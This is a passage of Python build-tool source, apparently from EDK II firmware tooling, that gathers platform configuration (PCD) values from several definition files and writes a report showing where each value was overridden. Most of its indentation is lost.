self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
for Name, Guid in StructPcdDict:
if (Name, Guid) not in Pa.Platform.Pcds:
Pcd = StructPcdDict[(Name, Guid)]
PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
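    #
    # Illustrative sketch of the overall PCD report structure produced above for
    # a platform-level call (ModulePcdSet is None):
    #
    #   PcdReport(Wa).GenerateReport(ReportFile, None)
    #   # 1) "Conditional Directives used by the build system" (when present)
    #   # 2) "PCDs not used by modules or in conditional directives" (when present)
    #   # 3) "Platform Configuration Database Report" with *B/*P/*F/*M markers
    #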
##
# Generate report for PCD information
#
    # This function generates the PCD report for the platform or for a single
    # module in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
    # @param ReportSubType  0 means platform/module PCD report, 1 means Conditional
    #                       directives section report, 2 means Unused Pcds section report
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
                #The DefaultValue of a StructurePcd is already the latest; no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
                    #The DefaultValue of a StructurePcd is already the latest; no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
                            #The DefaultValue of a StructurePcd is already the latest; no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
len(PcdValue) > 1 and PcdValue.lstrip('0'):
PcdValue = PcdValue.lstrip('0')
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
DecDefaultValue = DecDefaultValue.lstrip('0')
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
InfDefaultValue = InfDefaultValue.lstrip('0')
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
DscDefaultValue = DscDefaultValue.lstrip('0')
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
                    if TypeName not in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
ModuleDefault = ModuleDefault.lstrip('0')
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
        if IsStructure:
            for FieldValues in Pcd.DefaultValues.values():
                self.PrintStructureInfo(File, FieldValues)
        if DecMatch and IsStructure:
            for FieldValues in Pcd.DefaultValues.values():
                self.PrintStructureInfo(File, FieldValues)
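    #
    # Illustrative sketch of the default-value trailer printed above (hypothetical
    # PCD, spacing approximate): a "DSC DEFAULT" / "INF DEFAULT" / "DEC DEFAULT"
    # line is only emitted when the effective value differs from that layer's
    # default, e.g.
    #
    #   # *P PcdExampleToken        :  FIXED  (UINT32) = 0x200 (512)
    #   #                                      DEC DEFAULT = 0x100 (256)
    #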
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
else:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
PcdGuidList = self.UnusedPcds.get(Pcd.TokenSpaceGuidCName)
if PcdGuidList:
PcdList = PcdGuidList.get(Pcd.Type)
if not PcdList:
VPDPcdList.append(VPDPcdItem)
for VpdPcd in PcdList:
if PcdTokenCName == VpdPcd.TokenCName:
break
else:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues.get(Sku)
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
